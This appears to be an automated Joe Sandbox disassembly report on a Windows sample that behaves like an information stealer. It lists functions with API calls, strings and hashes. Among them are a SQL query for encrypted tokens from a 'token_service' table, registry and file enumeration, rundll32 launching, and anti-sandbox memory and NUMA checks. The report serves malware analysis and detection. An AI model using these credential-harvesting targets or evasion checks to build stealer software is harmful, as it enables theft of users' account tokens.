Instruction ID: ba4a912f34a6ab240f03399ec897c117189ceb9282cc0eaf369c81769a73d46f
Opcode Fuzzy Hash: 289973c41d267e15cc15f44ba20e5b83e962fce2ffd0ae7a3877ef2d23b008d0
Instruction Fuzzy Hash: 35513DB0D003189BDB24EF51DC45BEEBB75AB48309F5041AEE11966281DB386BC9CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B250 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000), ref: 0040B44D

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

StrStrA.SHLWAPI(00000000,AccountId), ref: 0040B47B
lstrlen.KERNEL32(00000000), ref: 0040B553
lstrlen.KERNEL32(00000000), ref: 0040B567

Strings

AccountTokens, xrefs: 0040B28A
AccountId, xrefs: 0040B472
AccountTokens, xrefs: 0040B319
SELECT service, encrypted_token FROM token_service, xrefs: 0040B3BB

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 2910778473-1079375795
Opcode ID: c2b616fceb2b523f678ee6d1321162e3b7608a751921dbbbaf96c728ac70b21a
Instruction ID: df2f8e8a8ca21c55da42a3c6f19f5118b3684059388f817d0631ea5bb79e5354
Opcode Fuzzy Hash: c2b616fceb2b523f678ee6d1321162e3b7608a751921dbbbaf96c728ac70b21a
Instruction Fuzzy Hash: 07A164759102089BCF14FBA1DC52EEE7739BF54308F51416EF506B2191EF38AA85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00414B79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
wsprintfA.USER32 ref: 00414BF6
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
RegCloseKey.ADVAPI32(00000000), ref: 00414C29
RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

RegQueryValueExA.KERNEL32(00000000,02F65320,00000000,000F003F,?,00000400), ref: 00414C89
lstrlen.KERNEL32(?), ref: 00414C9E
RegQueryValueExA.KERNEL32(00000000,02F651A0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,0041D4B4), ref: 00414D36
RegCloseKey.KERNEL32(00000000), ref: 00414DA5
RegCloseKey.ADVAPI32(00000000), ref: 00414DB7

Strings

%s\%s, xrefs: 00414BEA

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 55ffac29f649c296db956f249058352f4885b1e427db91d4517fbeeb358ac779
Instruction ID: d244d91c33a18a5b0a6d9a0a642cdc181f43283702d6765b4fd500d7f5e12fa2
Opcode Fuzzy Hash: 55ffac29f649c296db956f249058352f4885b1e427db91d4517fbeeb358ac779
Instruction Fuzzy Hash: 59213875A0021CABDB64CB50DC85FE973B9BF88300F0085D9A649A6180DF74AAC6CFE4

Uniqueness

Uniqueness Score: -1.00%

Function 00411D80 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411DA5
RegOpenKeyExA.KERNEL32(80000001,02F65B70,00000000,00020119,?), ref: 00411DC4
RegQueryValueExA.ADVAPI32(?,02F667E0,00000000,00000000,00000000,000000FF), ref: 00411DE8
RegCloseKey.ADVAPI32(?), ref: 00411DF2
lstrcat.KERNEL32(?,00000000), ref: 00411E17
lstrcat.KERNEL32(?,02F668A0), ref: 00411E2B

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
Instruction ID: 8aed71b150b2ed53c6c52757a29982c6d8c6785b9d22af2673d92710ece34b21
Opcode Fuzzy Hash: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
Instruction Fuzzy Hash: F641B4B2900108BBCB15EBE0DC86FEE733EAB88745F00454DF71A5A191EE7467848BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00409B30 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 360filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02F41CF8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00409BB1
lstrlen.KERNEL32(00000000), ref: 00409F6A

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000,00000000), ref: 00409CAD
DeleteFileA.KERNEL32(00000000), ref: 00409FEB

Strings

X@, xrefs: 00409BC4, 00409BF0, 00409FCD, 00409BC7, 00409BF3, 00409FD0

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
String ID: X@
API String ID: 3258613111-2850556465
Opcode ID: 451bb91afc3fcd0e57f46d38bff2fbc94ba52b83269fb9665794973e6d732dbe
Instruction ID: 70962d3f4e1e977daa55f2855abdfba287f36735b870bb76fdd61a7d9847a281
Opcode Fuzzy Hash: 451bb91afc3fcd0e57f46d38bff2fbc94ba52b83269fb9665794973e6d732dbe
Instruction Fuzzy Hash: BCD10376D101089ACB14FBA5DC91EEE7739BF14304F51825EF51672091EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 004136B0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F46B38), ref: 00415F11
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F614B0), ref: 00415F2A
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F61750), ref: 00415F42
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F61648), ref: 00415F5A
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F616D8), ref: 00415F73
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F60C18), ref: 00415F8B
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F608B0), ref: 00415FA3
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F60650), ref: 00415FBC
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F61720), ref: 00415FD4
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F61708), ref: 00415FEC
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F61678), ref: 00416005
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F61600), ref: 0041601D
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F60950), ref: 00416035
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F61618), ref: 0041604E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011D1

Part of subcall function 00401120: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
Part of subcall function 00401120: ExitProcess.KERNEL32 ref: 0040113E

Part of subcall function 004010D0: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
Part of subcall function 004010D0: VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
Part of subcall function 004010D0: ExitProcess.KERNEL32 ref: 00401103

Part of subcall function 004011E0: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401218
Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401226
Part of subcall function 004011E0: ExitProcess.KERNEL32 ref: 00401254

Part of subcall function 00413430: GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434

Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401186

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,02F61980,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02F60C98,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
CloseHandle.KERNEL32(00000000), ref: 004137B9
Sleep.KERNEL32(00001770), ref: 004137C4
CloseHandle.KERNEL32(?,00000000,?,02F60C98,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
ExitProcess.KERNEL32 ref: 004137E2

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$Alloclstrcpy$CloseEventHandleNameUser__aulldiv$ComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 1175201934-0
Opcode ID: 266543c17844d5236548024853ce236f08ed3d40338f621c7fc1cfef9c255876
Instruction ID: 0037ec1138340b95bb434dc328289296f16cab3c571637fdb93d627daa89b4d0
Opcode Fuzzy Hash: 266543c17844d5236548024853ce236f08ed3d40338f621c7fc1cfef9c255876
Instruction Fuzzy Hash: 7E318270A00204AADB04FBF2DC56BEE7779AF08708F10451EF112A61D2DF789A85C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 00410FA0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02F41CF8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

ShellExecuteEx.SHELL32(0000003C), ref: 00411307

Strings

C:\Windows\system32\rundll32.dll, xrefs: 004110BF
"" , xrefs: 004111DC
.dll, xrefs: 00411054
<, xrefs: 004112AC

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteFolderPathShellSystemTimelstrlen
String ID: "" $.dll$<$C:\Windows\system32\rundll32.dll
API String ID: 672783590-3078973353
Opcode ID: 5945be777b7cb80882b8bfbf35dda8425c0d32a23119c823d2319c53a9c9f90d
Instruction ID: ff393b419b3d9cd89bf84e2a65158e8723a283ad60ef2a05342f0777a40cb69c
Opcode Fuzzy Hash: 5945be777b7cb80882b8bfbf35dda8425c0d32a23119c823d2319c53a9c9f90d
Instruction Fuzzy Hash: 19A124759101089ACB15FB91DC92FDEB739AF14304F51425FE10666095EF38ABCACFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004123F0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,02F65680), ref: 0041244B

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 00412471
lstrcat.KERNEL32(?,?), ref: 00412490
lstrcat.KERNEL32(?,?), ref: 004124A4
lstrcat.KERNEL32(?,02F5F348), ref: 004124B7
lstrcat.KERNEL32(?,?), ref: 004124CB
lstrcat.KERNEL32(?,02F65AF0), ref: 004124DF

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Part of subcall function 004121F0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
Part of subcall function 004121F0: HeapAlloc.KERNEL32(00000000), ref: 00412207
Part of subcall function 004121F0: wsprintfA.USER32 ref: 00412223
Part of subcall function 004121F0: FindFirstFileA.KERNEL32(?,?), ref: 0041223A

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 167551676-0
Opcode ID: cc177fe26eae2ecf3fe3dec7e34db2c5f369d94a1c7a89d5a12b5640fbaeea76
Instruction ID: 26a05e4f659b4c4b868bb0234a0ad995871bbc4a3af1f84cd303f322fad0653f
Opcode Fuzzy Hash: cc177fe26eae2ecf3fe3dec7e34db2c5f369d94a1c7a89d5a12b5640fbaeea76
Instruction Fuzzy Hash: 083164B6900608A7CB20FBB0DC95EE9773DAB48704F40458EB3469A051EA7897C8CFD8

Uniqueness

Uniqueness Score: -1.00%

Function 004011E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
__aulldiv.LIBCMT ref: 00401218
__aulldiv.LIBCMT ref: 00401226
ExitProcess.KERNEL32 ref: 00401254

Strings

@, xrefs: 004011F3

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
Instruction ID: 7bcd30568b3a9749f5c78c38f6ef54fea4689c821e8202ed383253ad67bcf250
Opcode Fuzzy Hash: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
Instruction Fuzzy Hash: 8601FFB0940208EADB10EFD0CD4AB9EBBB8AB54705F204059E705B62D0D6785545875D

Uniqueness

Uniqueness Score: -1.00%

Function 6C01C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C01C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C01C969
GetSystemInfo.KERNEL32(?), ref: 6C01C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C01C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C01C9E2

Memory Dump Source

Source File: 00000001.00000002.2117587062.000000006C001000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C000000, based on PE: true

Associated: 00000001.00000002.2117549990.000000006C000000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2117710896.000000006C07D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2117761371.000000006C08E000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2117799562.000000006C092000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c000000_u42w.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: b8b35fa69ae11898be42f0ab9c736238385a5ddfc01d87e29609bad70c4ed83f
Instruction ID: b0031814a178a5f3200127cb711142bb0915f4e22753040ea6833af262c0bc4f
Opcode Fuzzy Hash: b8b35fa69ae11898be42f0ab9c736238385a5ddfc01d87e29609bad70c4ed83f
Instruction Fuzzy Hash: E121DA317467146BDF14AAB4DC88BAEB3F9AB47744F504529F907A7A40DF6098048BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00412980 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 004129BA
lstrcat.KERNEL32(?,0041D888), ref: 004129D7
lstrcat.KERNEL32(?,02F61C30), ref: 004129EB
lstrcat.KERNEL32(?,0041D88C), ref: 004129FD

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0

Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE

Strings

L0A, xrefs: 00412A22, 00412A51, 00412A73, 00412A25, 00412A54

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID: L0A
API String ID: 2667927680-1482484291
Opcode ID: 9250cd257da4f1d81ade23adeb63a50ebf0b9af3f830724eb909d2792711b615
Instruction ID: f34e92357168eddbedcb052ffd5f2c6281475bb6170069d81cff4dd89e8051f4
Opcode Fuzzy Hash: 9250cd257da4f1d81ade23adeb63a50ebf0b9af3f830724eb909d2792711b615
Instruction Fuzzy Hash: A621CCBA9005087BC724FBA0DD46EDA373E9B54745F00058AB64956081EE7867C48BD5

Uniqueness

Uniqueness Score: -1.00%

Function 00401260 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
HeapAlloc.KERNEL32(00000000), ref: 0040127B
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
RegCloseKey.ADVAPI32(?), ref: 004012BF

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
Instruction ID: 7bc2c45b39987af01ac2684a9b0918313f40fb8da876f9e4b9d967da472c28c8
Opcode Fuzzy Hash: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
Instruction Fuzzy Hash: 3C011D79A40608BFDB20DFE0DD49FAEB779AB88700F008159FA05E7280DA749A018B90

Uniqueness

Uniqueness Score: -1.00%

Function 00414740 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
HeapAlloc.KERNEL32(00000000), ref: 0041475B
RegOpenKeyExA.KERNEL32(80000002,02F5C500,00000000,00020119,00000000), ref: 0041477B
RegQueryValueExA.KERNEL32(00000000,02F65B30,00000000,00000000,000000FF,000000FF), ref: 0041479C
RegCloseKey.ADVAPI32(00000000), ref: 004147A6

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
Instruction ID: 520453153fef2218f7e1f18e9bcc50e310f062f1fe861ea372c3465721436b4a
Opcode Fuzzy Hash: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
Instruction Fuzzy Hash: 62013C79A40608FFDB20DBE4ED49FAEB779EB88700F108159FA05A6290DB705A018F90

Uniqueness

Uniqueness Score: -1.00%

Function 00414300 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
HeapAlloc.KERNEL32(00000000), ref: 0041431B
RegOpenKeyExA.KERNEL32(80000002,02F5C110,00000000,00020119,00000000), ref: 0041433B
RegQueryValueExA.KERNEL32(00000000,02F650F8,00000000,00000000,000000FF,000000FF), ref: 0041435C
